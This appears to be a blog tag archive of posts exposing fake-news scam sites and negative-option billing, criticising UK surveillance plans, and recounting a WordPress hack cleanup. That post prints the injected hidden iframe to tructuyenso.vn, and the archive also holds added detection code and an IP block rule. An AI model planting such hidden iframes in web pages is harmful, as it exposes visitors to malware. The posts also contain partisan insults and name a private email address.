Tag Archive: dodgy

(Karmic) Retribution on Pacific Webworks?

Chapter 11 Bankruptcy on Internet “Business”, Pacific Webworks.

Tangled Web

Following several knock-downs by disgruntled, ripped-off individuals and hefty wallops from Google, it appears that running legal is difficult for Utah-based business Pacific Webworks (PWW) ….  They’ve just filed for Chapter 11 bankruptcy.  Announcement here.

This allows them to stay in business and re-organise their debts… gives them a “fresh” start, it says.

Sow and Ye Shall Reap.

Karmic retribution is a bit like Jesus’ saying about reaping what you sow.

If you examine this web search on this website you will see that I have written several articles on PWW and their previously dodgy web practices.  Many times I warned them that their behaviour would lead to no-good.  I stated that I did not have to do anything – that karma would see them fail – and so they have.

The Future

PWW, formerly a tarmac company, now has time to figure out what to do.  If they stay legal I wish them well and hope they prosper.  If not, there’s always karmic retribution.  Reducing this makes us and the world, better.

 

Estonian Spammer Forges CBS and The Guardian

Get Rich Quick Scam Forges Genuine News Agencies Web Pages

Gmail Spam

I recently received two emails from a friend’s old Hotmail account, but to two of my email addresses.

Email Spam

Probably, the account has been hacked as I could detect no spoofing in the emails’ headers.  These are the emails, with the email addresses blacked out.

Initial Email Investigations

The text is similar in that they try to entice a user using pretty poor English to click on the shortened URL links, which are active.

Here’s how the links work:
To my Email address;
cbsbusiness9

I had http://cbsbusiness9.com/index2.php?/5260 which then goes to

http://cbsbusiness9.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/

 

To my GMail address;
cbsnews-article

I had http://cbsnews-article.com/index2.php?/4032 which then goes to

http://cbsnews-article.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/

 

The screenshots show the results using a neat Firefox plugin, Flagfox, which displays the source IP address and country on mouse-over.

The WHOIS’s of each domain are almost identical.  These are screenshots.

whois.domaintools.com screen capture 2012-12-12-17-12-26

whois.domaintools.com screen capture 2012-12-12-17-13-17

That Arthor Brown’s a one, eh?  Notice the Ukrainian, Russian and New York connections?  Who is/are, or what is:

TNew line ave 172 95
NY, 18274
UNITED STATES
+1.7343541732

Google Search on +1.7343541732

Googling the phone number pulls out a heap of (not)surprises including an awful cesspit of scamminess that’s now starting to rival Pacific Webworks’ Google Treasure Chest and Jesse Willms’ Colon cleansing efforts!  (We saw these scams a few years back – check the links)

Just check out the fake news and dodgy sounding sites in the search results….  These are the first couple of pages of current search results:

  • Com-news8.net
  • Bcnews8.com
  • Dildobigg.com
  • Raspberry-Ketone24.com
  • BigGgEts.com
  • HurtGuys.com
  • GrowsPeniss.com
  • HugerAss.com
  • Com-news9.net
  • Com-nbcnews9.net
  • coloncleanse-extreme.com
  • nbc9news.com
  • nbc1news.com

Arthor Brown is in most of them with his Yahoo! email address as arthor-brown289289@ymail.com.   Please don’t confuse him with this Arthur Brown, but yes, handle all of these websites like Fire!
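Both link chains above rely on the same trick: the Guardian-looking "path" sits after the `?`, so it is only a query string and the page is still served by the spammer's host. The following is an added example, not part of the original post, that splits each URL and reports brand names appearing in it while the registrable domain is not one of the brand's own. The `OFFICIAL` domain list and the `co.uk` shortcut are assumptions made for the illustration.

```python
from urllib.parse import urlsplit

# Assumption (not from the post): the domains each brand really publishes on.
OFFICIAL = {
    "guardian": {"theguardian.com", "guardian.co.uk"},
    "cbs": {"cbsnews.com", "cbs.com"},
    "nbc": {"nbcnews.com", "nbc.com"},
}
# Tiny stand-in for the Public Suffix List; enough for the samples below.
TWO_LABEL_SUFFIXES = {"co.uk"}


def registrable_domain(host):
    """Reduce a hostname to the part somebody actually registered."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def brand_mismatches(url):
    """Return (registrable domain, [(brand, where), ...]).

    A hit means the brand name occurs in the host, path or query string
    although the registrable domain belongs to nobody on the OFFICIAL list.
    Plain substring matching: a heuristic that can miss and can over-match.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    if any(domain in real for real in OFFICIAL.values()):
        return domain, []  # genuinely served by one of the brands
    places = (
        ("host", host),
        ("path", parts.path.lower()),
        ("query", parts.query.lower()),
    )
    hits = [
        (brand, where)
        for brand in OFFICIAL
        for where, text in places
        if brand in text
    ]
    return domain, hits


def flag_urls(urls):
    """Map each suspicious URL to its list of brand hits."""
    flagged = {}
    for url in urls:
        _, hits = brand_mismatches(url)
        if hits:
            flagged[url] = hits
    return flagged


# URLs quoted in the post, two domains from the search-result list
# (scheme added), and one constructed genuine address for contrast.
SAMPLE_URLS = [
    "http://cbsbusiness9.com/index2.php?/5260",
    "http://cbsbusiness9.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/",
    "http://cbsnews-article.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/",
    "http://Com-nbcnews9.net/",
    "http://nbc9news.com/",
    "http://www.guardian.co.uk/small-business-network",  # constructed
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        domain, hits = brand_mismatches(url)
        verdict = ", ".join(f"{b} in {w}" for b, w in hits) or "no mismatch"
        print(f"{domain:24} {verdict}")
```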

Forged Webpages of The Guardian Newspaper

cbsnews-article.com screen capture 2012-12-12-16-3-51

cbsbusiness9.com screen capture 2012-12-12-16-3-23

The Guardian, is an old and respected news organisation in the UK.  CBS is a long-established US media network.

They, and the purported author of both webpages, Sirena Bergman, must be pretty pissed off about the hijacking of their names.

Also to be annoyed, is Lloyds TSB Bank who apparently are “in association” with this get rich quick scheme for work at home moms!

Completely Forged News Articles!

Indeed they are.

  • The articles are dated “December, 11:41”, which is odd since there’s no day, just month and time!
  • Both articles are embedded in genuine Guardian web-pages, with all the links surrounding the article going to genuine Guardian web-pages or genuine advertiser websites!
  • The hook links in both forged webpages go to http://workinghome22.com/go.php

The forgery is done in the same manner as the well-known phishing scams done for banks and on-line finance and insurance.

Apart from the images sourced from The Guardian, the scammer’s images are sourced from:

  • ddmcdn.com which is HowStuffWorks.com!
  • localconsumeralerts.com
  • prosperadtracker.com
  • ophan.co.uk

So, Who Is workinghome22.com

Bad Gateway

The first link was dead, opening a bad gateway so the expected redirect didn’t work.  The tracking pointed back to Ireland!

Bad Gateway

The second link worked, but the sweetly named workingfromhome22.com wasn’t the destination.   No, the link immediately re-directed to http://onlineincnow.com/2/?aff_sub=72

Well, at least the affiliate number 72 is getting paid….

But hang on, who exactly is workingfromhome22.com?
workinghome22.com screen capture 2012-12-12-16-31-44

Well, typing the URL directly takes me to workingfromhome22.com!  This is it!

Cunningly, you’ll note that it’s pulled out my home-town as Bournemouth (where I live) with that awful “mom” Americanism!  No-one in the UK addresses their mother as mom…  I mean, FFS?

The webpage links, containing the disreputably used graphics of Thomson, Reuters, CNBC and NBC Universal all point to http://workinghome22.com/go.php, which is of course in this domain.  So let’s click it, shall we?

Well, pctrck.com is trying to load, but not much else.

Reversing then trying to exit workinghome22.com produces a pop-up of dubious functionality!  Check the words – there’s no cancel button!

workinghoome22_Popup

I did however manage to successfully close this page following that.  Whew!

Now Back to onlineincnow.com

OnlineIncNow Location

The previously mentioned http://onlineincnow.com/2/?aff_sub=72 is located in the USA.

So What Is It Up To?

OnlineIncNow.com Whois Record

Good Question!   A WHOIS puts the registrant in China with the DNS servers in Russia!

As I mentioned earlier, the similarity of the scamminess of this thing is just like the Google Treasure Chest/ Google Money Tree / PWW scams of old.

The site is plastered with the logos of well known businesses to add an air of authenticity to things (just as the original hook sites used The Guardian Newspaper and CBS in the same way) yet at the bottom of the page they disingenuously add:

This site and the products and services offered on this site are not associated, affiliated, endorsed, or sponsored by NBCNEWS, ABC, USA Today, CNN or Fox News, nor have they been reviewed tested or certified by NBCNEWS, ABC, USA Today, CNN or Fox News.

onlineincnow.com T&C Screenshot

Despite all this, it is of course bollox set to deceive.  In fact, it now appears that it’s the well known negative option scam, used by Pacific Webworks (PWW) and Jesse Willms to good effect until they were found out.

Let’s see how this pans out, shall we?…..

Check out the T&C page from the tiny link in the page footer – screenshot on the right.

  • They say that the applicable law is the State of Florida.
  • You will become a “member” and the key phrases are here:

You must register as a “Member” with Online Income Now to access certain functions of the website. You must provide current, complete and accurate information about yourself (the “Registration Data”) when registering as a Member. You agree that such information is truthful and complete. You agree to maintain and keep your Registration Data current and to update your Registration Data as soon as it changes. You are responsible for maintaining the security of your password. Online Income Now is not liable for any loss that you suffer through the use of your password by others. You agree to notify Online Income Now immediately of any unauthorized use of your account or other breach of security known to you. You also, by becoming a Member, agree to report violations of these Terms and Conditions by others to Online Income Now.

For a limited time only, the cost of this product is $97.00 ( usual price $299.95 ) and every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.

MATERIALS PROVIDED TO Online Income Now OR POSTED AT ANY Online Income Now’s WEB SITE

Online Income Now does not claim ownership of the materials you provide to Online Income Now (including feedback and suggestions) or post, upload, input or submit to any Online Income Now Web Site or its associated services (collectively “Submissions”). However, by posting, uploading, inputting, providing or submitting your Submission you are granting Online Income Now, its affiliated companies and necessary sublicensees, permission to use your Submission in connection with the operation of their Internet businesses including, without limitation, the rights to: copy, distribute, transmit, publicly display, publicly perform, reproduce, edit, translate and reformat your Submission; and to publish your name in connection with your Submission.

You’ll see that “Online Income Now” will:

  • make you a “member” (of what?)
  • and you will be regularly billed, (why?)
  • and that for anything you post, upload etc (wah?  whadya mean?  Where is this uploading?),  “Online Income Now” will take no responsibility for what you do!

…………….which is curious as you don’t know what you’ll be doing and they have invited you to do it in the first place!!!

Now Let’s Click The Link!  Follow that Opportunity!

onlineincnow.com screen capture 2012-12-12-17-46-50

2 Spots Left!

Amazingly (sarcasm alert) there are two “spots” left in my area!  This is the page… http://onlineincnow.com/2/index2.php

Michelle Johnson is the “guru” who will tell me everything!  So what do I do?  I have two options:

  • Back out
  • Sign up

Let’s Try Backing Out, Shall We?

Cannot Backout From OnlineIncNow 2

Cannot Backout From OnlineIncNow

Well of course, they won’t let me.  It takes two goes to get out and the first one completely takes over the browser!  Bad.  This is B.A.D.

Ah, well.  Finally escaped.

Let’s Try Clicking to the Signup Page, Shall We?

secure.onlineincnow.com Data Entry Screen

I decide on my name, “Jobless Jake” and a random phone number…. The website is now https://secure.onlineincnow.com/2/cc_97.php

What I see is bad, really bad, and any attempt by this pack of jokers at saying they don’t run a negative option scam is now revealed on this sign-up page!

The scam is now revealed for what it is – a negative option scam!        Read it carefully…..  They expressly say;

By enrolling, you will be charged a one-time fee of $97.00

In teeny-tiny letters, note!

But remember, right back buried in the T&C’s they say;

every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.

This is expressly against the FTC code and laws in most countries.  If any extra charges are to be levied for any service or goods, they should be expressly stated on the sign-up page where the customer first enters their financial details.

Gotcha! You Bastards!

Okay, I’ve Had Enough of This. I’m Off!

“Not so fast, young Jobless Jake”, say onlineincnow.com……!

Cannot Backout From OnlineIncNow 3

They’ve an extra 20% off plus an extra bit of webpage-erese!  The screenshot says it all, though it wasn’t the end of it.  I had one more “Leave Page” option like the earlier one above.

Conclusion

Negative Options are banned by law in most countries.  If you get collared by one, you’ll have a job stopping the bastards taking money from your account for ages.  The only sure way to stop this once you’ve been sucked in is through….

  • Chargebacks.   Get your bank or card company to get a charge-back saying the terms of trade or purchase were hidden (as seen in my screenshot above).

So………………….

  • It’s a scam.
  • Stay away from it.


Tories Reveal Authoritarian Roots While Liberals Check Their Shoelaces

None are more hopelessly enslaved than those who falsely believe they are free. – Johann Wolfgang von Goethe

Yet again I’m forced to side with the grinning David Davis.  This doesn’t happen often and is embarrassing to admit!

ConDem Coalition Pledges Broken!

It’s all about the government plans to allow full-scale unauthorised real-time monitoring of every person in the UK’s internet activity!  It’s so 1984.

“It was a bright cold day in April, and the clocks were striking thirteen” – George Orwell: Nineteen Eighty-Four.

Orwell must be turning in his grave in despair that what he predicted as a warning about what not to do, now looks like coming to fruition.

Remarkably, since wangling themselves into government, the conservative-libdem coalition government is now actually dropping a key part of their manifesto which they laboriously agreed two years ago.  This can still be found on the government website, page 11 to be exact (pdf) .  Here’s what they said:

  • The Government believes that the British state has become too authoritarian…. We need to restore the rights of individuals in the face of encroaching state power – FAIL
  • …reverse the substantial erosion of civil liberties and roll back state intrusion – FAIL
  • … introduce safeguards against the misuse of anti-terrorism legislation – FAIL
  • …end the storage of internet and email records without good reason – FAIL
  • …a British Bill of Rights that … protects and extends British liberties – FAIL

(Actually, the whole Con-Dem pledge list makes good reading to see just how far removed from it our evil diktat of quangos has become.)

So what to do – use TOR.

ID Cards

Johann Wolfgang Goethe (Photo credit: andreasmarx)

Not so long ago I was haranguing the former Labour government about their plans for ID Cards, their laws over CCTV and photographing in public places, the reduction in privacy for individuals and the removal of our civil rights over detention without trial, due cause and 3rd party notification for first 90 days and then 42 days.

I left the Labour Party because of it and have not rejoined.

Huge Vocal Resentment Against UK Government Secret Citizen Monitoring Plans.

try the Tor browser bundle

The new news (I thought it was an April Fool joke initially!) is that Email and web use is ‘to be monitored’ under new laws proposed by this nasty, nasty government.  Happily, there is now a huge and vociferous resentment against this from the general public who can see this evil act for what it is.  Top among them is David Davis!  See this link and the thousands of comments for instance; Backlash over email and web monitoring plan.

Clueless

Now, the tories and their liberal stooges have been shown to be both serially evil in their pronouncements and plans, and also serially incompetent of managing almost anything.

Their pathetic management of a minor industrial dispute (the fuel shortage) which did nothing except invoke almost universal resentment of the coalition and reawaken a general awareness of their ineffectiveness comes on top of stripping the very foundations away from one of UK society’s greatest inventions of the Industrial Age, our National Health Service (NHS).

Top this behavioural abomination with that of the revolving door policy between banking and politics which they continue to promote with zero penalties for failure while the population-at-large have to prop up the whole system with their taxes means only two things to me.

  1. The government must do something desperate to have any hope of re-election in 3 years – this means either war (patriotism is the last refuge of a scoundrel) or economic boom-and-bust gambling.
  2. They will do something desperate to have any hope of re-election in 3 years – this means either war (patriotism is the last refuge of a scoundrel) or economic boom-and-bust gambling.

Astute folk will see this as my prediction for government actions over the next 3 years.

Tories: Keep Friends Happy

Meanwhile, hundreds of extra Tory donors will soon be available to bankroll the “all is good” story.  They will arrive as beneficiaries of the windfall provided as the “former NHS” contracts are handed out to friends, much like Michael Ashcroft benefited from the first round of NHS privatisation during the Thatcher era.  This article on Powerbase and this one (sourced from a now defunct article in The Scotsman) show quite clearly that 1/3 of cleaning contracts went to Ashcroft’s businesses during this time, saying;

MICHAEL Ashcroft, (…) bankrolled an “independent” publicity campaign that allowed his multi-million-pound contract cleaning empire to prosper and led to a change in the law. The campaign was run from the London office of the former Conservative Scottish secretary, Michael Forsyth. A spokesman for Mr Ashcroft confirmed last night that he had contributed to the Public and Local Service Efficiency Campaign (PULSE), which was set up in 1985 to persuade the public sector to contract out services such as cleaning and catering. The campaign had been disbanded by the end of the 1980s after the Conservative government passed the 1988 Local Government Act .  Mr Ashcroft’s Hawley Services Group, a contract cleaning firm later known as ADT, flourished under the new regime, with ADT, winning a third of NHS contracts between 1983 and 1988.

For further information into the depths that the Tories will go to enable all public money to be fed straight to their business friends, see this article which pulls apart the dealings of Ashcroft, discredited Dame Shirley Porter, NIMBY Nicholas Ridley, Chris Chope (the dog turd of Christchurch) and current (dodgy expenses, remember) minister Eric Pickles.

THE PICKLES PAPERS

By Tony Grogan
First published by 1 IN 12 PUBLICATIONS 1989
21 – 23 Albion St. Bradford 1.
Copyright 1 IN 12 Publications 1989
ISBN 0 948994 04 5

Once read, apply the same logic to our dear NHS, and weep again.  The same modus operandi is being used;

  1. discredit the current, imply alternatives are better;
  2. farm out internal monies to external Tory benefactors.

It’s just more sleaze just like under Thatcher before, backed up with warlike rhetoric.  Remember, only 10 days ago we had the news of billionaire Tory donors at Cameron’s dinner table, and Cameron trying to defend the cash-for-access news that made Labour’s cash-for-questions scandal appear like a sweetshop-ish wheeze in comparison.  See 

Tory Party chairman Lord Feldman was one of the key figures in the ‘cash for access’ scandal which erupted after Tory party treasurer Peter Cruddas was caught offering a private dinner with David Cameron to undercover reporters who posed as wealthy party donors.  Read more: http://www.dailymail.co.uk/debate/article-2123692/Tory-cash-access-row-David-Cameron-crony-pal-cash-questions.html

as well.

FTC Take Action: Is This The End of The Fake News Site?

FTC Permanently Stops Six Operators from Using Fake News Sites that Allegedly Deceived Consumers about Acai Berry Weight-Loss Products

Above is the FTC’s own headline from a news release yesterday.  The story is that they’ve hammered six operators of fake news sites into making settlements that surrender their assets.  They’ve also halted the six operations plus those of four others, making ten by my calculation!

What Is a Fake News Site?

Do you really need to ask?   !!    (These are for news7digest, see more below on this!).

Anyone who even casually browses the web will have seen these news exposes, quite often advertised down the right side on Facebook and in banner adverts on even the most sensible of websites – like this one, say!

How the adverts work is that they are paid for by the operators.  They deliberately pay to get premium visibility slots, using Google often, but not exclusively.

The fake news site itself will be plastered with well known icons of top companies (like CNN, BBC, CBC, ABC, Google even!) and purport to be a serious investigation by a journalist into whatever the scam may be.  A short list of such scams that we’ve revealed here are:

  • Acai weight loss
  • Tea weight loss.
  • Acai bowel cleanse.
  • Other bowel cleanse.
  • Get rippling muscles.
  • Make money on Google.
  • Get a cheap payday loan.
  • Get a cheap government grant.
  • Get rejuvenation skin cream.
  • Look younger in other ways.
  • Gamble on penny auctions.

channel4online.co.uk

Just yesterday, Peter Farrahy asked why these fake news sites are still going on this post about Jesse Willms.

So taking his example of the very plausible looking channel4online.co.uk and doing a search on it like so:

http://www.google.co.uk/search?q=channel4online.co.uk

…produces several links to the actual Channel 4 in the UK, and the scam site….

This shows the deliberate, deceptive and despicable way in which the site name has been chosen to closely imitate a legitimate and bona-fide news organisation.  Fraud, in other words – as the definition says – “an intentional deception made for personal gain or to damage another individual”

Amazingly, if you click the link several times, each effort takes you to one of three different landing pages for a new site, the actual fake news site of,

news7digest.com

This shows up in the header image in two, but confusingly is called Consumer Reporter in the other!  They are all visually quite different.

The three screenshots near the top of this article are indeed the three fake news sites which you’ll land on by clicking on channel4online.co.uk.

Here they are again, to save you scrolling:

Conclusion

Is this the end of the fake news sites?  Well, obviously not.

They are still very very current and still very very visible.  The highly photoshopped images adorn well known websites to the point of irritation.  However, the settlement was only yesterday.  The note on the FTC statement goes on to say;

A settlement order is for settlement purposes only and does not constitute an admission by the defendant that the law has been violated. Settlement orders have the force of law when approved and signed by the District Court judge.

Despite this, it appears the six defendants are caving in as no appeals have been launched.  They, and the details of the settlements, are as follows:

  • Ricardo Jose Labra: Labra’s $2.5 million judgment will be suspended when he pays $280,000 and records a $39,500 lien on his home.
  • Zachary S. Graham, Ambervine Marketing, LLC and Encastle, Inc.: Graham’s $953,000 judgment will be suspended when he pays $110,000 plus most of the proceeds from the sale of a truck.
  • Tanner Garrett Vaughn: Vaughn’s $203,000 judgment will be suspended when he pays close to $80,000 over a three-year period.
  • Thou Lee: Lee’s $204,000 judgment will be suspended when he pays $13,000 plus the proceeds from the sale of a BMW.
  • Charles Dunlevy: Dunlevy’s $143,000 judgment will be suspended when he pays an estimated $2,000 from frozen assets and the sale of a boat.
  • DLXM, LLC and Michael Volozin: The $594,000 judgment will be suspended because of the defendants’ inability to pay.

 

I see it as a warning shot.  The actual wording of the terms against the six goes as follows.  It’s quite onerous and specific, I think, which means that these News7Digest screenshots at the top of this posting put the operators in deep doggy do if they don’t get their act together pronto.  The highlights are mine.

As part of its ongoing crackdown on bogus health claims, the proposed settlements will require that the six operations make clear when their commercial messages are advertisements rather than objective journalism, and will bar the defendants from further deceptive claims about health-related products such as the acai berry weight-loss supplements and colon cleansers that they marketed.

The defendants also are required to disclose any material connections they have with merchants, and will be barred from making deceptive claims about other products, such as the work-at-home schemes or penny auctions that most of them promoted.  The settlements also require that these defendants collectively pay roughly $500,000 to the Commission because their advertisements violated federal law.  This money amounts to most of their assets.

A Sample of My Previous Posts Mentioning Fake News Websites

This all proves that what I and others are saying is wrong – and the FTC is proving it!  Virtually everything that the scammers do the FTC has now taken issue with and imposed heavy penalties.  It’s now, as they say, case law, as well as being the law of the land.  Let’s hope that Willms who chucked his power derived from ill-gotten wealth at me making me pull a page or two for a time, gets his just deserts – sometime this year would be nice.

 

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

# Apache 2.2 syntax: refuse GET and POST requests from clients in 112.0.0.0/8, allow everyone else
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download – it’s clean!  I then uploaded a whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
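The injected markup only showed up in the rendered page source, so that is the place to look for it whichever theme file emitted it. The following is an added example, not part of the original post and not Sucuri's method, that parses a page and reports iframes which are invisible (zero size or hidden by style) and load from a host other than the site's own. The sample page is constructed around the iframe quoted above; `video.example` and `/wp-content/tracker.html` are made-up values.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ZERO_SIZE = re.compile(r"^\s*0+(?:\.0+)?\s*(?:px|%)?\s*$", re.I)
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?<![-\w])(?:width|height)\s*:\s*0+(?:px)?\s*(?:;|$)",
    re.I,
)


class HiddenFrameFinder(HTMLParser):
    """Collect iframes the visitor cannot see that load another site."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def _is_own(self, host):
        return any(host == h or host.endswith("." + h) for h in self.own_hosts)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # Bare attributes such as `nosize` arrive with value None.
        a = {name: (value or "") for name, value in attrs}
        try:
            host = (urlsplit(a.get("src", "").strip()).hostname or "").lower()
        except ValueError:  # malformed src, nothing to resolve
            host = ""
        if not host or self._is_own(host):
            return  # relative or same-site frame
        reasons = [
            dim + "=0"
            for dim in ("width", "height")
            if ZERO_SIZE.match(a.get(dim, ""))
        ]
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            line, _ = self.getpos()
            self.findings.append({"line": line, "host": host, "reasons": reasons})


def scan_html(html, own_hosts):
    """Return one finding per hidden third-party iframe in `html`."""
    finder = HiddenFrameFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed page: a visible embed, a hidden same-site frame, and the
# link plus iframe quoted in the post (link title shortened).
SAMPLE_PAGE = """<html>
<body>
<p>Post text</p>
<iframe width="560" height="315" src="https://video.example/embed/1"></iframe>
<iframe width="0" height="0" src="/wp-content/tracker.html"></iframe>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, ["strangelyperfect.tv"]):
        print(f"line {f['line']}: hidden iframe to {f['host']} ({', '.join(f['reasons'])})")
```

Feed it the HTML your browser actually receives (saved page source), not only the theme files, so injected output is caught regardless of where it was planted.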

A recheck on Sucuri shows my website to be okay now.  See screendump below.   I’ll be using Sucuri a lot more!

Sucuri Site Check

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me